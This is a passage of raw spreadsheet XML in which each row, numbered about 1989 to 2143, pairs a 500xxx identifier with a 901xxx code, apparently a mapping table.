    <row r="1989" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1989" s="5">
        <v>500068</v>
      </c>
      <c r="B1989" s="3">
        <v>901036</v>
      </c>
    </row>
    <row r="1990" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1990" s="5">
        <v>500068</v>
      </c>
      <c r="B1990" s="3">
        <v>901095</v>
      </c>
    </row>
    <row r="1991" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1991" s="5">
        <v>500068</v>
      </c>
      <c r="B1991" s="3">
        <v>901003.00100000005</v>
      </c>
    </row>
    <row r="1992" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1992" s="5">
        <v>500068</v>
      </c>
      <c r="B1992" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="1993" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1993" s="5">
        <v>500068</v>
      </c>
      <c r="B1993" s="3">
        <v>901055</v>
      </c>
    </row>
    <row r="1994" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1994" s="5">
        <v>500068</v>
      </c>
      <c r="B1994" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="1995" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1995" s="5">
        <v>500033</v>
      </c>
      <c r="B1995" s="3">
        <v>901087.00100000005</v>
      </c>
    </row>
    <row r="1996" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1996" s="5">
        <v>500033</v>
      </c>
      <c r="B1996" s="3">
        <v>901087.00199999998</v>
      </c>
    </row>
    <row r="1997" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1997" s="5">
        <v>500033</v>
      </c>
      <c r="B1997" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="1998" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1998" s="5">
        <v>500033</v>
      </c>
      <c r="B1998" s="3">
        <v>901036.005</v>
      </c>
    </row>
    <row r="1999" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1999" s="5">
        <v>500033</v>
      </c>
      <c r="B1999" s="3">
        <v>901003</v>
      </c>
    </row>
    <row r="2000" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2000" s="5">
        <v>500033</v>
      </c>
      <c r="B2000" s="3">
        <v>901057</v>
      </c>
    </row>
    <row r="2001" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2001" s="5">
        <v>500033</v>
      </c>
      <c r="B2001" s="3">
        <v>901049</v>
      </c>
    </row>
    <row r="2002" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2002" s="5">
        <v>500033</v>
      </c>
      <c r="B2002" s="3">
        <v>901007</v>
      </c>
    </row>
    <row r="2003" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2003" s="5">
        <v>500056</v>
      </c>
      <c r="B2003" s="3">
        <v>901547.00100000005</v>
      </c>
    </row>
    <row r="2004" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2004" s="5">
        <v>500056</v>
      </c>
      <c r="B2004" s="3">
        <v>901543.00300000003</v>
      </c>
    </row>
    <row r="2005" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2005" s="5">
        <v>500056</v>
      </c>
      <c r="B2005" s="3">
        <v>901587.00199999998</v>
      </c>
    </row>
    <row r="2006" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2006" s="5">
        <v>500056</v>
      </c>
      <c r="B2006" s="3">
        <v>901587.00300000003</v>
      </c>
    </row>
    <row r="2007" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2007" s="5">
        <v>500056</v>
      </c>
      <c r="B2007" s="3">
        <v>901189</v>
      </c>
    </row>
    <row r="2008" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2008" s="5">
        <v>500056</v>
      </c>
      <c r="B2008" s="3">
        <v>901036.00399999996</v>
      </c>
    </row>
    <row r="2009" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2009" s="5">
        <v>500056</v>
      </c>
      <c r="B2009" s="3">
        <v>901036.005</v>
      </c>
    </row>
    <row r="2010" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2010" s="5">
        <v>500056</v>
      </c>
      <c r="B2010" s="3">
        <v>901553.00199999998</v>
      </c>
    </row>
    <row r="2011" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2011" s="5">
        <v>500056</v>
      </c>
      <c r="B2011" s="3">
        <v>901205.00100000005</v>
      </c>
    </row>
    <row r="2012" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2012" s="5">
        <v>500056</v>
      </c>
      <c r="B2012" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="2013" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2013" s="5">
        <v>500056</v>
      </c>
      <c r="B2013" s="3">
        <v>901078.00300000003</v>
      </c>
    </row>
    <row r="2014" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2014" s="5">
        <v>500024</v>
      </c>
      <c r="B2014" s="3">
        <v>901547.00100000005</v>
      </c>
    </row>
    <row r="2015" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2015" s="5">
        <v>500024</v>
      </c>
      <c r="B2015" s="3">
        <v>901562.00100000005</v>
      </c>
    </row>
    <row r="2016" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2016" s="5">
        <v>500024</v>
      </c>
      <c r="B2016" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="2017" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2017" s="5">
        <v>500024</v>
      </c>
      <c r="B2017" s="3">
        <v>901055.00100000005</v>
      </c>
    </row>
    <row r="2018" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2018" s="5">
        <v>500075</v>
      </c>
      <c r="B2018" s="3">
        <v>901071.00100000005</v>
      </c>
    </row>
    <row r="2019" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2019" s="5">
        <v>500075</v>
      </c>
      <c r="B2019" s="3">
        <v>901059.00300000003</v>
      </c>
    </row>
    <row r="2020" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2020" s="5">
        <v>500075</v>
      </c>
      <c r="B2020" s="3">
        <v>901059.005</v>
      </c>
    </row>
    <row r="2021" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2021" s="5">
        <v>500075</v>
      </c>
      <c r="B2021" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="2022" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2022" s="5">
        <v>500075</v>
      </c>
      <c r="B2022" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="2023" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2023" s="5">
        <v>500075</v>
      </c>
      <c r="B2023" s="3">
        <v>901053.005</v>
      </c>
    </row>
    <row r="2024" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2024" s="5">
        <v>500075</v>
      </c>
      <c r="B2024" s="3">
        <v>901218.00699999998</v>
      </c>
    </row>
    <row r="2025" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2025" s="5">
        <v>500075</v>
      </c>
      <c r="B2025" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="2026" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2026" s="5">
        <v>500106</v>
      </c>
      <c r="B2026" s="3">
        <v>901071</v>
      </c>
    </row>
    <row r="2027" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2027" s="5">
        <v>500106</v>
      </c>
      <c r="B2027" s="3">
        <v>901071.00100000005</v>
      </c>
    </row>
    <row r="2028" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2028" s="5">
        <v>500106</v>
      </c>
      <c r="B2028" s="3">
        <v>901547.00100000005</v>
      </c>
    </row>
    <row r="2029" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2029" s="5">
        <v>500106</v>
      </c>
      <c r="B2029" s="3">
        <v>901037</v>
      </c>
    </row>
    <row r="2030" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2030" s="5">
        <v>500106</v>
      </c>
      <c r="B2030" s="3">
        <v>901059.00399999996</v>
      </c>
    </row>
    <row r="2031" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2031" s="5">
        <v>500106</v>
      </c>
      <c r="B2031" s="3">
        <v>901059.00600000005</v>
      </c>
    </row>
    <row r="2032" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2032" s="5">
        <v>500106</v>
      </c>
      <c r="B2032" s="3">
        <v>901543.00199999998</v>
      </c>
    </row>
    <row r="2033" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2033" s="5">
        <v>500106</v>
      </c>
      <c r="B2033" s="3">
        <v>901140</v>
      </c>
    </row>
    <row r="2034" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2034" s="5">
        <v>500106</v>
      </c>
      <c r="B2034" s="3">
        <v>901190</v>
      </c>
    </row>
    <row r="2035" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2035" s="5">
        <v>500106</v>
      </c>
      <c r="B2035" s="3">
        <v>901222.00199999998</v>
      </c>
    </row>
    <row r="2036" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2036" s="5">
        <v>500106</v>
      </c>
      <c r="B2036" s="3">
        <v>901564.00100000005</v>
      </c>
    </row>
    <row r="2037" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2037" s="5">
        <v>500106</v>
      </c>
      <c r="B2037" s="3">
        <v>901574.00600000005</v>
      </c>
    </row>
    <row r="2038" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2038" s="5">
        <v>500106</v>
      </c>
      <c r="B2038" s="3">
        <v>901562.00100000005</v>
      </c>
    </row>
    <row r="2039" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2039" s="5">
        <v>500106</v>
      </c>
      <c r="B2039" s="3">
        <v>901562.00399999996</v>
      </c>
    </row>
    <row r="2040" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2040" s="5">
        <v>500106</v>
      </c>
      <c r="B2040" s="3">
        <v>901070.00199999998</v>
      </c>
    </row>
    <row r="2041" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2041" s="5">
        <v>500106</v>
      </c>
      <c r="B2041" s="3">
        <v>901070.00399999996</v>
      </c>
    </row>
    <row r="2042" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2042" s="5">
        <v>500106</v>
      </c>
      <c r="B2042" s="3">
        <v>901070.00600000005</v>
      </c>
    </row>
    <row r="2043" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2043" s="5">
        <v>500106</v>
      </c>
      <c r="B2043" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="2044" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2044" s="5">
        <v>500106</v>
      </c>
      <c r="B2044" s="3">
        <v>901036.005</v>
      </c>
    </row>
    <row r="2045" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2045" s="5">
        <v>500106</v>
      </c>
      <c r="B2045" s="3">
        <v>901046</v>
      </c>
    </row>
    <row r="2046" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2046" s="5">
        <v>500106</v>
      </c>
      <c r="B2046" s="3">
        <v>901571</v>
      </c>
    </row>
    <row r="2047" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2047" s="5">
        <v>500106</v>
      </c>
      <c r="B2047" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="2048" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2048" s="5">
        <v>500106</v>
      </c>
      <c r="B2048" s="3">
        <v>901027.00199999998</v>
      </c>
    </row>
    <row r="2049" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2049" s="5">
        <v>500106</v>
      </c>
      <c r="B2049" s="3">
        <v>901027.00399999996</v>
      </c>
    </row>
    <row r="2050" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2050" s="5">
        <v>500106</v>
      </c>
      <c r="B2050" s="3">
        <v>901057</v>
      </c>
    </row>
    <row r="2051" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2051" s="5">
        <v>500106</v>
      </c>
      <c r="B2051" s="3">
        <v>901055.00199999998</v>
      </c>
    </row>
    <row r="2052" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2052" s="5">
        <v>500106</v>
      </c>
      <c r="B2052" s="3">
        <v>901021.00399999996</v>
      </c>
    </row>
    <row r="2053" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2053" s="5">
        <v>500106</v>
      </c>
      <c r="B2053" s="3">
        <v>901018</v>
      </c>
    </row>
    <row r="2054" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2054" s="5">
        <v>500106</v>
      </c>
      <c r="B2054" s="3">
        <v>901496</v>
      </c>
    </row>
    <row r="2055" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2055" s="5">
        <v>500106</v>
      </c>
      <c r="B2055" s="3">
        <v>901014</v>
      </c>
    </row>
    <row r="2056" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2056" s="5">
        <v>500106</v>
      </c>
      <c r="B2056" s="3">
        <v>901053.00300000003</v>
      </c>
    </row>
    <row r="2057" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2057" s="5">
        <v>500106</v>
      </c>
      <c r="B2057" s="3">
        <v>901518.00100000005</v>
      </c>
    </row>
    <row r="2058" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2058" s="5">
        <v>500106</v>
      </c>
      <c r="B2058" s="3">
        <v>901082</v>
      </c>
    </row>
    <row r="2059" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2059" s="5">
        <v>500106</v>
      </c>
      <c r="B2059" s="3">
        <v>901552.00399999996</v>
      </c>
    </row>
    <row r="2060" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2060" s="5">
        <v>500106</v>
      </c>
      <c r="B2060" s="3">
        <v>901102</v>
      </c>
    </row>
    <row r="2061" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2061" s="5">
        <v>500106</v>
      </c>
      <c r="B2061" s="3">
        <v>901102.00100000005</v>
      </c>
    </row>
    <row r="2062" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2062" s="5">
        <v>500048</v>
      </c>
      <c r="B2062" s="3">
        <v>901547.00100000005</v>
      </c>
    </row>
    <row r="2063" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2063" s="5">
        <v>500048</v>
      </c>
      <c r="B2063" s="3">
        <v>901189</v>
      </c>
    </row>
    <row r="2064" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2064" s="5">
        <v>500048</v>
      </c>
      <c r="B2064" s="3">
        <v>901574.00100000005</v>
      </c>
    </row>
    <row r="2065" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2065" s="5">
        <v>500048</v>
      </c>
      <c r="B2065" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="2066" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2066" s="5">
        <v>500048</v>
      </c>
      <c r="B2066" s="3">
        <v>901219</v>
      </c>
    </row>
    <row r="2067" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2067" s="5">
        <v>500048</v>
      </c>
      <c r="B2067" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="2068" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2068" s="5">
        <v>500048</v>
      </c>
      <c r="B2068" s="3">
        <v>901102.00100000005</v>
      </c>
    </row>
    <row r="2069" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2069" s="5">
        <v>500034</v>
      </c>
      <c r="B2069" s="3">
        <v>901087.00199999998</v>
      </c>
    </row>
    <row r="2070" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2070" s="5">
        <v>500034</v>
      </c>
      <c r="B2070" s="3">
        <v>901087.00300000003</v>
      </c>
    </row>
    <row r="2071" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2071" s="5">
        <v>500034</v>
      </c>
      <c r="B2071" s="3">
        <v>901098</v>
      </c>
    </row>
    <row r="2072" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2072" s="5">
        <v>500034</v>
      </c>
      <c r="B2072" s="3">
        <v>901583.00100000005</v>
      </c>
    </row>
    <row r="2073" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2073" s="5">
        <v>500034</v>
      </c>
      <c r="B2073" s="3">
        <v>901583.00399999996</v>
      </c>
    </row>
    <row r="2074" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2074" s="5">
        <v>500034</v>
      </c>
      <c r="B2074" s="3">
        <v>901595.00199999998</v>
      </c>
    </row>
    <row r="2075" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2075" s="5">
        <v>500034</v>
      </c>
      <c r="B2075" s="3">
        <v>901071.00100000005</v>
      </c>
    </row>
    <row r="2076" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2076" s="5">
        <v>500034</v>
      </c>
      <c r="B2076" s="3">
        <v>901110.00300000003</v>
      </c>
    </row>
    <row r="2077" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2077" s="5">
        <v>500034</v>
      </c>
      <c r="B2077" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="2078" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2078" s="5">
        <v>500034</v>
      </c>
      <c r="B2078" s="3">
        <v>901059.00300000003</v>
      </c>
    </row>
    <row r="2079" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2079" s="5">
        <v>500034</v>
      </c>
      <c r="B2079" s="3">
        <v>901059.005</v>
      </c>
    </row>
    <row r="2080" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2080" s="5">
        <v>500034</v>
      </c>
      <c r="B2080" s="3">
        <v>901136</v>
      </c>
    </row>
    <row r="2081" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2081" s="5">
        <v>500034</v>
      </c>
      <c r="B2081" s="3">
        <v>901136.00199999998</v>
      </c>
    </row>
    <row r="2082" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2082" s="5">
        <v>500034</v>
      </c>
      <c r="B2082" s="3">
        <v>901555.00300000003</v>
      </c>
    </row>
    <row r="2083" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2083" s="5">
        <v>500034</v>
      </c>
      <c r="B2083" s="3">
        <v>901485</v>
      </c>
    </row>
    <row r="2084" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2084" s="5">
        <v>500034</v>
      </c>
      <c r="B2084" s="3">
        <v>901132.00100000005</v>
      </c>
    </row>
    <row r="2085" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2085" s="5">
        <v>500034</v>
      </c>
      <c r="B2085" s="3">
        <v>901005</v>
      </c>
    </row>
    <row r="2086" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2086" s="5">
        <v>500034</v>
      </c>
      <c r="B2086" s="3">
        <v>901491.00199999998</v>
      </c>
    </row>
    <row r="2087" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2087" s="5">
        <v>500034</v>
      </c>
      <c r="B2087" s="3">
        <v>901140</v>
      </c>
    </row>
    <row r="2088" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2088" s="5">
        <v>500034</v>
      </c>
      <c r="B2088" s="3">
        <v>901587.00100000005</v>
      </c>
    </row>
    <row r="2089" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2089" s="5">
        <v>500034</v>
      </c>
      <c r="B2089" s="3">
        <v>901561.00199999998</v>
      </c>
    </row>
    <row r="2090" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2090" s="5">
        <v>500034</v>
      </c>
      <c r="B2090" s="3">
        <v>901499</v>
      </c>
    </row>
    <row r="2091" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2091" s="5">
        <v>500034</v>
      </c>
      <c r="B2091" s="3">
        <v>901585.00100000005</v>
      </c>
    </row>
    <row r="2092" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2092" s="5">
        <v>500034</v>
      </c>
      <c r="B2092" s="3">
        <v>901585.00199999998</v>
      </c>
    </row>
    <row r="2093" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2093" s="5">
        <v>500034</v>
      </c>
      <c r="B2093" s="3">
        <v>901041</v>
      </c>
    </row>
    <row r="2094" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2094" s="5">
        <v>500034</v>
      </c>
      <c r="B2094" s="3">
        <v>901203</v>
      </c>
    </row>
    <row r="2095" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2095" s="5">
        <v>500034</v>
      </c>
      <c r="B2095" s="3">
        <v>901133</v>
      </c>
    </row>
    <row r="2096" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2096" s="5">
        <v>500034</v>
      </c>
      <c r="B2096" s="3">
        <v>901083</v>
      </c>
    </row>
    <row r="2097" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2097" s="5">
        <v>500034</v>
      </c>
      <c r="B2097" s="3">
        <v>901592.00199999998</v>
      </c>
    </row>
    <row r="2098" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2098" s="5">
        <v>500034</v>
      </c>
      <c r="B2098" s="3">
        <v>901589.00199999998</v>
      </c>
    </row>
    <row r="2099" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2099" s="5">
        <v>500034</v>
      </c>
      <c r="B2099" s="3">
        <v>901589.00300000003</v>
      </c>
    </row>
    <row r="2100" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2100" s="5">
        <v>500034</v>
      </c>
      <c r="B2100" s="3">
        <v>901590.00100000005</v>
      </c>
    </row>
    <row r="2101" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2101" s="5">
        <v>500034</v>
      </c>
      <c r="B2101" s="3">
        <v>901591.00199999998</v>
      </c>
    </row>
    <row r="2102" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2102" s="5">
        <v>500034</v>
      </c>
      <c r="B2102" s="3">
        <v>901562.00199999998</v>
      </c>
    </row>
    <row r="2103" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2103" s="5">
        <v>500034</v>
      </c>
      <c r="B2103" s="3">
        <v>901070.00399999996</v>
      </c>
    </row>
    <row r="2104" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2104" s="5">
        <v>500034</v>
      </c>
      <c r="B2104" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="2105" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2105" s="5">
        <v>500034</v>
      </c>
      <c r="B2105" s="3">
        <v>901056.00100000005</v>
      </c>
    </row>
    <row r="2106" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2106" s="5">
        <v>500034</v>
      </c>
      <c r="B2106" s="3">
        <v>901570</v>
      </c>
    </row>
    <row r="2107" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2107" s="5">
        <v>500034</v>
      </c>
      <c r="B2107" s="3">
        <v>901036.005</v>
      </c>
    </row>
    <row r="2108" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2108" s="5">
        <v>500034</v>
      </c>
      <c r="B2108" s="3">
        <v>901040</v>
      </c>
    </row>
    <row r="2109" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2109" s="5">
        <v>500034</v>
      </c>
      <c r="B2109" s="3">
        <v>901571</v>
      </c>
    </row>
    <row r="2110" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2110" s="5">
        <v>500034</v>
      </c>
      <c r="B2110" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="2111" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2111" s="5">
        <v>500034</v>
      </c>
      <c r="B2111" s="3">
        <v>901027.00199999998</v>
      </c>
    </row>
    <row r="2112" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2112" s="5">
        <v>500034</v>
      </c>
      <c r="B2112" s="3">
        <v>901588.00199999998</v>
      </c>
    </row>
    <row r="2113" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2113" s="5">
        <v>500034</v>
      </c>
      <c r="B2113" s="3">
        <v>901588.00600000005</v>
      </c>
    </row>
    <row r="2114" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2114" s="5">
        <v>500034</v>
      </c>
      <c r="B2114" s="3">
        <v>901003.00100000005</v>
      </c>
    </row>
    <row r="2115" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2115" s="5">
        <v>500034</v>
      </c>
      <c r="B2115" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="2116" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2116" s="5">
        <v>500034</v>
      </c>
      <c r="B2116" s="3">
        <v>901566.00199999998</v>
      </c>
    </row>
    <row r="2117" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2117" s="5">
        <v>500034</v>
      </c>
      <c r="B2117" s="3">
        <v>901598.00300000003</v>
      </c>
    </row>
    <row r="2118" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2118" s="5">
        <v>500034</v>
      </c>
      <c r="B2118" s="3">
        <v>901090</v>
      </c>
    </row>
    <row r="2119" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2119" s="5">
        <v>500034</v>
      </c>
      <c r="B2119" s="3">
        <v>901219</v>
      </c>
    </row>
    <row r="2120" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2120" s="5">
        <v>500034</v>
      </c>
      <c r="B2120" s="3">
        <v>901021.00199999998</v>
      </c>
    </row>
    <row r="2121" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2121" s="5">
        <v>500034</v>
      </c>
      <c r="B2121" s="3">
        <v>901018</v>
      </c>
    </row>
    <row r="2122" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2122" s="5">
        <v>500034</v>
      </c>
      <c r="B2122" s="3">
        <v>901593</v>
      </c>
    </row>
    <row r="2123" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2123" s="5">
        <v>500034</v>
      </c>
      <c r="B2123" s="3">
        <v>901594</v>
      </c>
    </row>
    <row r="2124" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2124" s="5">
        <v>500034</v>
      </c>
      <c r="B2124" s="3">
        <v>901505.00100000005</v>
      </c>
    </row>
    <row r="2125" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2125" s="5">
        <v>500034</v>
      </c>
      <c r="B2125" s="3">
        <v>901505.00300000003</v>
      </c>
    </row>
    <row r="2126" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2126" s="5">
        <v>500034</v>
      </c>
      <c r="B2126" s="3">
        <v>901218.01100000006</v>
      </c>
    </row>
    <row r="2127" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2127" s="5">
        <v>500034</v>
      </c>
      <c r="B2127" s="3">
        <v>901195.00199999998</v>
      </c>
    </row>
    <row r="2128" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2128" s="5">
        <v>500034</v>
      </c>
      <c r="B2128" s="3">
        <v>901082</v>
      </c>
    </row>
    <row r="2129" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2129" s="5">
        <v>500034</v>
      </c>
      <c r="B2129" s="3">
        <v>901016</v>
      </c>
    </row>
    <row r="2130" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2130" s="5">
        <v>500034</v>
      </c>
      <c r="B2130" s="3">
        <v>901049</v>
      </c>
    </row>
    <row r="2131" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2131" s="5">
        <v>500034</v>
      </c>
      <c r="B2131" s="3">
        <v>901033</v>
      </c>
    </row>
    <row r="2132" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2132" s="5">
        <v>500034</v>
      </c>
      <c r="B2132" s="3">
        <v>901199</v>
      </c>
    </row>
    <row r="2133" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2133" s="5">
        <v>500034</v>
      </c>
      <c r="B2133" s="3">
        <v>901204.00100000005</v>
      </c>
    </row>
    <row r="2134" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2134" s="5">
        <v>500034</v>
      </c>
      <c r="B2134" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="2135" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2135" s="5">
        <v>500034</v>
      </c>
      <c r="B2135" s="3">
        <v>901078</v>
      </c>
    </row>
    <row r="2136" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2136" s="5">
        <v>500034</v>
      </c>
      <c r="B2136" s="3">
        <v>901078.00199999998</v>
      </c>
    </row>
    <row r="2137" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2137" s="5">
        <v>500034</v>
      </c>
      <c r="B2137" s="3">
        <v>901102.00199999998</v>
      </c>
    </row>
    <row r="2138" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2138" s="5">
        <v>500034</v>
      </c>
      <c r="B2138" s="3">
        <v>901047</v>
      </c>
    </row>
    <row r="2139" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2139" s="5">
        <v>500029</v>
      </c>
      <c r="B2139" s="3">
        <v>901036.00199999998</v>
      </c>
    </row>
    <row r="2140" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2140" s="5">
        <v>500104</v>
      </c>
      <c r="B2140" s="3">
        <v>901547.00100000005</v>
      </c>
    </row>
    <row r="2141" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2141" s="5">
        <v>500104</v>
      </c>
      <c r="B2141" s="3">
        <v>901059.005</v>
      </c>
    </row>
    <row r="2142" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2142" s="5">
        <v>500104</v>
      </c>
      <c r="B2142" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="2143" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2143" s="5">
